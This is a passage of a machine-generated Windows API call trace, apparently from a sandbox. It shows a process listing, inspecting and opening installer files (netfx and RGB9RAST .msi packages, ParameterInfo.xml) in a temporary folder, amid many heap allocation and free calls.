HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0068.609] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0068.609] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0068.609] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0068.609] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0068.609] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0068.609] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0068.609] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0068.609] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0068.609] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0068.609] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0068.609] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0068.609] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0068.609] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0068.609] AreFileApisANSI () returned 1 [0068.610] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0068.610] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71960 [0068.610] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi") returned 45 [0068.610] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x86.msi"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x7626f700, ftCreationTime.dwHighDateTime=0x1cac6f6, ftLastAccessTime.dwLowDateTime=0x7626f700, ftLastAccessTime.dwHighDateTime=0x1cac6f6, ftLastWriteTime.dwLowDateTime=0x7626f700, ftLastWriteTime.dwHighDateTime=0x1cac6f6, nFileSizeHigh=0x0, nFileSizeLow=0x79000)) returned 1 [0068.610] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0068.610] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0068.610] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0068.610] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0068.610] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.610] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.610] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x4a0f7400, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x4a0f7400, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x4a0f7400, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x426ae, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ParameterInfo.xml", cAlternateFileName="PARAME~1.XML")) returned 1 [0068.610] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0068.610] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0068.610] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0068.610] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0068.610] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0068.610] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0068.610] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0068.610] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0068.610] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0068.610] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0068.610] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0068.610] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0068.610] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0068.610] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0068.610] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0068.610] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0068.610] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0068.610] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0068.610] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0068.610] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0068.610] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0068.611] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0068.611] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0068.611] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0068.611] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0068.611] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0068.611] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.611] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.611] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.611] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.611] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0068.611] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0068.611] AreFileApisANSI () returned 1 [0068.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\ParameterInfo.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\ParameterInfo.xml", lpUsedDefaultChar=0x0) returned 40 [0068.611] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0068.611] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.611] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.611] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0068.611] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0068.611] AreFileApisANSI () returned 1 [0068.611] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0068.611] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0068.611] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x6d058, cchWideChar=40 | out: lpWideCharStr="C:\\588bce7c90097ed212\\ParameterInfo.xml") returned 40 [0068.611] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\ParameterInfo.xml" (normalized: "c:\\588bce7c90097ed212\\parameterinfo.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0068.612] GetFileType (hFile=0x428) returned 0x1 [0068.612] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0068.612] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0068.612] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0068.613] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0068.613] CloseHandle (hObject=0x428) returned 1 [0068.613] AreFileApisANSI () returned 1 [0068.613] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0068.613] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d738 [0068.613] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x6d738, cchWideChar=40 | out: lpWideCharStr="C:\\588bce7c90097ed212\\ParameterInfo.xml") returned 40 [0068.613] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\ParameterInfo.xml" (normalized: "c:\\588bce7c90097ed212\\parameterinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0068.613] GetFileType (hFile=0x428) returned 0x1 [0068.613] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0068.613] CloseHandle (hObject=0x428) returned 1 [0068.613] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0068.613] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0068.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0068.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0068.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0068.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0068.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0068.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0068.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0068.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0068.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0068.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0068.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0068.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0068.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0068.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0068.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0068.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0068.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0068.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0068.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0068.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0068.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0068.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0068.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0068.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0068.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0068.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0068.614] AreFileApisANSI () returned 1 [0068.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0068.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0068.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x6cef8, cchWideChar=40 | out: lpWideCharStr="C:\\588bce7c90097ed212\\ParameterInfo.xml") returned 40 [0068.614] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\ParameterInfo.xml" (normalized: "c:\\588bce7c90097ed212\\parameterinfo.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x4a0f7400, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x4a0f7400, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x4a0f7400, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x426ae)) returned 1 [0068.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0068.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0068.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0068.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0068.615] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.615] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.615] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x19dedd00, ftCreationTime.dwHighDateTime=0x1ca2a1b, ftLastAccessTime.dwLowDateTime=0x19dedd00, ftLastAccessTime.dwHighDateTime=0x1ca2a1b, ftLastWriteTime.dwLowDateTime=0x19dedd00, ftLastWriteTime.dwHighDateTime=0x1ca2a1b, nFileSizeHigh=0x0, nFileSizeLow=0x2d200, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="RGB9RAST_x64.msi", cAlternateFileName="RGB9RA~1.MSI")) returned 1 [0068.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0068.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0068.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0068.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0068.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0068.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0068.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0068.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0068.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0068.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0068.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0068.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0068.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0068.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0068.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0068.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0068.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0068.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0068.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0068.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0068.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0068.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d210 [0068.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0068.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0068.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0068.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d210 | out: hHeap=0x20000) returned 1 [0068.615] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.615] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.615] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.615] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0068.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0068.616] AreFileApisANSI () returned 1 [0068.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi", lpUsedDefaultChar=0x0) returned 39 [0068.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0068.616] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.616] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0068.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0068.616] AreFileApisANSI () returned 1 [0068.616] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0068.616] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6d688 [0068.616] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x6d688, cchWideChar=39 | out: lpWideCharStr="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi") returned 39 [0068.616] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x64.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0068.616] GetFileType (hFile=0x428) returned 0x1 [0068.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0068.616] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0068.617] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0068.617] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0068.617] CloseHandle (hObject=0x428) returned 1 [0068.617] AreFileApisANSI () returned 1 [0068.617] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0068.617] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6d738 [0068.617] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x6d738, cchWideChar=39 | out: lpWideCharStr="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi") returned 39 [0068.617] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0068.617] GetFileType (hFile=0x428) returned 0x1 [0068.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0068.618] CloseHandle (hObject=0x428) returned 1 [0068.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0068.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0068.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0068.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0068.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0068.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0068.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0068.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0068.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0068.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0068.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0068.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0068.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0068.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0068.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0068.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0068.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0068.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0068.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0068.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0068.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0068.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 